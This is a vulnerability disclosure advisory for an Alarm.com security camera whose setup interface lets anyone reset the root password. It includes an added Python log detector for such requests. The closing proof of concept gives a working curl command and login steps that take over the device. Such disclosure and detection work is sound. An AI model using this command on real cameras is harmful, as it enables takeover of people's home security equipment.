Responsible Disclosure

1. Vulnerability Details.

Title: CVE-2018-19588: Alarm.com ADC-V522IR 0100b9 Incorrect access controls.

Affected Vendor: Alarm.com

Affected Product: ADC-V522IR

Affected Version: 0100b9, potentially others

Platform: Embedded Linux

Impact: Privilege Escalation

Attack vector: HTTP

CVE ID: CVE-2018-19588, CVE-2019-9657

2. Vulnerability Description.

Any user with access to the Alarm.com camera can access the web administration console.

3. Technical Description.

Alarm.com did not sanitize Vivotek's commands to ensure the root password could not be altered during camera setup through the web administration interface. By sending the request shown in the proof of concept below to the wifi setup process, an attacker effectively resets the root password and is then given access to the camera. This allows the attacker to change any of the preconfigured settings. In addition, it allows the attacker to download and restore a backup of the /etc/ directory that is customized for Alarm.com's configuration.
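Added example (not code from the advisory or from the vendor): a small detector that scans HTTP access logs in Common Log Format for requests to setparam.cgi that set an account password, the request pattern the description above relies on. It assumes such logs are available (from the camera or an in-line proxy) and that other account slots follow the same security_user_i<N>_pass naming as the i0 parameter in the proof of concept; the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Common Log Format (not real camera logs).
SAMPLE_LOG = """\
192.168.1.23 - - [26/Nov/2018:10:14:02 +0000] "GET /cgi-bin/viewer/video.jpg HTTP/1.1" 200 51234
192.168.1.23 - - [26/Nov/2018:10:14:09 +0000] "GET /cgi-bin/admin/setparam.cgi?security_user_i0_pass=password HTTP/1.1" 200 12
192.168.1.23 - - [26/Nov/2018:10:14:15 +0000] "GET /cgi-bin/admin/getparam.cgi?network HTTP/1.1" 200 884
192.168.1.40 - - [26/Nov/2018:10:15:01 +0000] "GET /cgi-bin/admin/setparam.cgi?network_ipaddress=192.168.1.50 HTTP/1.1" 401 0
192.168.1.23 - - [26/Nov/2018:10:16:30 +0000] "GET /cgi-bin/admin/setparam.cgi?security_user_i1_name=guest&security_user_i1_pass=guest HTTP/1.1" 200 12
"""

# Client, timestamp, request line and status code of a CLF entry.
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Endpoint used in the advisory's proof of concept.
SETPARAM_PATH = "/cgi-bin/admin/setparam.cgi"

# security_user_i0_pass is the parameter from the advisory; matching any
# account slot (i0, i1, ...) is an assumption about the naming scheme.
PASS_PARAM_RE = re.compile(r"^security_user_i\d+_pass$")


def find_password_changes(log_text):
    """Return one finding per request that sets an account password."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF entries
        url = urlsplit(m["target"])
        if url.path != SETPARAM_PATH:
            continue
        # keep_blank_values so "..._pass=" (empty password) is still seen
        names = [k for k, _ in parse_qsl(url.query, keep_blank_values=True)]
        hits = sorted({n for n in names if PASS_PARAM_RE.match(n)})
        if hits:
            findings.append({
                "client": m["client"],
                "time": m["time"],
                "status": int(m["status"]),  # 200 means the camera accepted it
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in find_password_changes(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} status={f['status']} set {', '.join(f['params'])}")
```

Because the parameter travels in the query string, a plain GET to this endpoint with a `_pass` parameter is visible to any device logging the request line, so the same check works as a proxy or IDS rule.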

4. Mitigation and Remediation Recommendation

Vendor is working on an update.

5. Credits

VFX Team.

6. Disclosure Timeline

Jul 12, 2019 - Vendor responded.

Jul 9, 2019 - Published.

Mar 8, 2019 - Vendor responded, but did not have any additional information.

Jan 2, 2019 - Vendor contacted.

Dec 7, 2018 - Vendor contacted.

Nov 26, 2018 - Proof of concept disclosed to vendor.

Oct 22, 2018 - Vendor contacted.

7. Proof of Concept

Connect to the camera wifi on setup.

curl -v "http://192.168.1.1/cgi-bin/admin/setparam.cgi?security_user_i0_pass=password"

Connect camera to ethernet.

Login as root/password.

© 2002-2024 VFX Computing, Inc. All Rights Reserved.